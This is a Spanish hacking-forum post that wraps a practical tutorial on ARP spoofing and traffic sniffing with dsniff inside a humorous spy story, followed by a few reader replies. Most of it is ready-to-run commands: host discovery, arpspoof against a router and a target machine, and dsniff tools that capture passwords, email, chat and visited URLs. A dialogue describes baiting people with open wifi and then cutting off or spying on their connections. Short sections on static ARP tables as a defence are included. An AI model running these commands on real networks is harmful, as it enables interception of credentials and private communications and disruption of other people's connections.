Nos acercamos a la vecina con dsniff

Iniciado por ANTRAX, Julio 30, 2014, 09:33:46 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 30, 2014, 09:33:46 AM Ultima modificación: Julio 30, 2014, 09:35:52 AM por ANTRAX

Mientras ella vigilaba yo había boteado mi lápiz, esta vez com BackTrack (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) las herramientas que necesitaba eran, digamos que más informales y aunque todas están en esta formidable distro (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) en este capítulo se actuará como si se instalaran en el HD. Primero, qué menos que conocer la ip de mi improvisado equipo :

Código: bash
ifconfig


Y ver las máquinas que hay en la red en la que me encuentro:

Código: bash
nmap -sP 192.168.1.0/24


Bajo e instalo arp-sk-0.0.16.tgz (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) junto con libnet1 y el paquete que nos va a permitir husmear por la red para intentar descubrir datos del paradero de mi vecina.

Código: bash
apt-get install dsniff


Activo forwarding para que los paquetes vayan a sus verdaderos destinatarios:

Código: bash
echo 1 > /proc/sys/net/ipv4/ip_forward


Y lanzo arpspoof para redirigir los paquetes del router a la máquina atacada y viceversa:

Código: bash
arpspoof -i eth0 -t 192.168.1.1 192.168.1.135 2> /dev/null &
arpspoof -i eth0 -t 192.168.1.135 192.168.1.1 2> /dev/null &


Para ver las todas posibilidades de jugar, integrados en esta aplicación:

Código: bash
dpkg -L dsniff | grep bin


Empiezo a abrir consolas, las esparzo por la pantalla, me rooteo en todas y en cada una lanzo un proceso. Para snifar contraseñas (si hay suerte, que no siempre ocurre):

Código: bash
dsniff -m -i eth0


Si la red es inalámbrica sustituir "eth0″ por "wlan0″. Con -m se intenta determinar el protocolo automáticamente a partir del archivo /usr/share/dsniff/dsniff.magic. No lanzo "macof" porque no tengo la intención de dejarla red inservible pero sí para capturar tráfico nfs, correo (Outlook, Thunderbird..) y sesiones de chat (Messenger, Yahoo, ...):

Código: bash
filesnarf -i eth0
mailsnarf -i eth0
msgsnarf -i eth0


Para analizar el tráfico ssh (Aunque, a veces, las contraseñas siendo correctas se detecten como "Password authentication failed")

Código: bash
sshow -i eth0


Ver todas las páginas que visita el husmeado:

Código: bash
urlsnarf -i eth0


- Oye, ¿sabes que los famosos protocolos de cifrado de contraseñas wifi, las famosas WPE y WPA, se craquean en menos que canta un gallo?

- Y, ¿Qué?

- Pues que las noches en las que no tengo nada que hacer voy de pesca...

- ¿De pesca?

- Dejo la wifi abierta (sin contraseña) y espero que alguien pique. Luego con dsniff me divierto un buen rato hasta que el piratilla se asquea...

- Mira que eres malo

- Con # tcpkill -i eth0 host nombre_del_host.com le mato conexiones, con # tcpnice -A -i eth0 tcp se las ralentizo y con # webspy -i eth0 IP y en la barra del navegador pongo la IP del intruso veo por donde navega... Oye, es divertidísimo que te chupen wifi....

- Vaya pedazo de kcron estás hecho....

Analizando todos los datos que arrojaba cada una de las terminales pudimos averiguar un montón de cosas importantes. Desconectamos el equipo y lo volvimos a dejar todo como estaba. Salimos de nuestro escondite y nos dirigimos a las dependencias 98 Milenium, en la quinta planta. Los pasillos estaban muy concurridos. Unos guardias de seguridad pasaron por nuestro lado y, por lo que comentaban, había algún intruso en la 7 planta. Sin duda nos buscaban a nosotros. El administrador dela red , que se le supone "estar al tajo", seguro que había detectado MACs duplicadas, síntoma de que alguien está fisgoneando donde no debe, con:

Código: bash
arp -a


Yo, en mi pc antes de que me lo destrozaran, para evitar el envenenamiento ARP había creado tablas ARP estáticas:

Código: bash
arp -s 192.168.2.2 00:35:4c:31:1A:12


O para hacerlo permanente:

Código: bash
touch /etc/arp.conf
nano /etc/arp.conf


Y en su interior poner la MAC (o MACs) del equipo y separado por un espacio la IP del/los pcs:

00:35:4c:31:1A:12 192.168.2.2

Se edita:

Código: bash
nano /etc/network/interfaces


Y en la última línea se pone:

Código: bash
post-up /usr/sbin/arp -f /etc/arp.conf


En cuestiones de seguridad nada es infalible, pero siempre puedes tocarles los bzips a los curiosos. Mientras pasábamos por un pasillo flanqueado por grandes vidrieras que daban a estancias repletas de oficinistas, volvimos a ver a .(punto)Antúnez. Nos mimetizamos con los que estaban esperando su turno alrededor de una máquina de café sin quitarle ojo de encima. Al rato salió, acompañado de otra persona con la que mantenía una animada charla. Entraron en el ascensor y descendieron hasta la planta -2. Hacia allí nos dirigimos. Por aquella planta no se veía un alma. Decidimos entrar por una puerta al azar.



- ¡Alto! a qué departamento están adscritos...

Nos asaltaron al abrir la puerta...

- .dll

- Esto está en la 3ª planta

- Perdón...

Cerramos.

- ¿Te has fijado?

- ¿Me engañó la vista o todos estaban atados a las sillas delante del monitor?

- Viste bien... y les torturaban con el "tour de güindous"... sssssshhhh .....se oyen pasos... ¡entremos aquí!

Nos metimos en los servicios

- Precisamente buscaba unos.....

....

- Ella tan tranquila haciendo sus necesidades...

- ¡Pues no!... me permites coger un poco de papel...

Fuente: tuxapuntes


Muy completo ANTRAX!

Se ve muy interesante este método, siempre hay que tener cuidado con las WiFis abiertas, pueden ser anzuelos.


Un saludo

Enviado desde mi Smartphone

Jeje muy bueno.

Me gustó la idea de enseñar con una historia.

Saludos!
WhiZ


HoneyPot para los incautos y aprovechados...

Muy buena información ANTRAX!!!

Gracias!!!
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.